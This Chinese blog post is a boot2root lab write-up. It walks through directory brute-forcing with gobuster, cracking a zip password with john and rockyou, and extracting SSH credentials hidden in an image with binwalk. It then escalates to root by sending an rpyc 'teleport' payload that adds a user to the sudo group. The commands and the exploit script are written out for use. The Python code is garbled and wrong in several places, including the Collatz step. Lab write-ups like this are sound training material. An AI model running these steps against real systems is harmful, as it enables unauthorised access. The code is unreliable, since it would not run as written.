0
点赞
收藏
分享

微信扫一扫

第九周打靶过程及思路

贵州谢高低 2022-05-02 阅读 136
网络安全

第八周打靶过程及思路:
1.常规端口服务侦探

2.用gubuster进行路径爆破,发现war下war-is-over新目录
gobuster dir -r -u http://10.0.2.16/ -x txt,html,php -w /usr/share/seclists/Discovery/Web-Content/common.txt

3.发现base64编码字符串,在cyberchef里面解码发现混乱无序
使用entro进行熵增探测发现熵值为7.9超过7.5证明是经过加密或压缩后的文件
侦探发现是一个zip压缩文件,下载保存后进行解压发现需要密码

4.使用john进行密码爆破
首先将文件保存成hash值zip2john a.zip >hash
将wordlists里的Rockyou字典解压保存到桌面
john hash --wordlists=rockyou.txt得到密码ragnarok123

5.发现解压后有图片文件,思考是否有隐写数,使用工具进行探测隐写
使用steghide工具进行探测 steghide info king但是发现又需要密码
使用binwalk进行二进制的分析,binwalk -B king发现存在压缩文件
查看后得到ssh账号密码尝试登录成功

6.查看readme文件里提示需要造船
boat文件里面给出提示是考拉兹猜想,进行质数查找,编写简单的素数判断程序
对第29个质数进行考拉兹计算后打印ASCII编码对应的字符串
n=0
for x in range (1000)
if x<2:
continute
h=int(x/2)+1
for i in range(2,h):
if x%i=0:
break
else:
n+=1
print(n,“:”,x)
进行考拉兹判断
i=109
c=[i]
while i≠1:
if i%2=1:
i=i%3+1
else:
i=i//2
if i<256:
c.append(i)
print©
mR)|>^/Gky[gz=.F#j5P(
7.将数字进行ASCII编码还原,将得到的字符串进行ssh登录,发现进入后进行自动sudo
先bin/bash -i 进行提权,查看运行脚本的文件,里面运用了rpyc远程管理
import rpyc
def shell():
import os
os.system(“sudo usermod -a -G sudo ragnar”)
conn = rpyc.classic.connect(“localhost”)
fn=conn.teleport(shell)
fn()

8.目标靶机上查看18812端口是否开启
ss -pantu | grep 18812发现开启,并且是本机127.0.0.1,所以代码需要在靶机上运行
运行脚本,升级shell ,/bin/bash

9.sudo -s成功提权到root权限,打靶完成

举报

相关推荐

0 条评论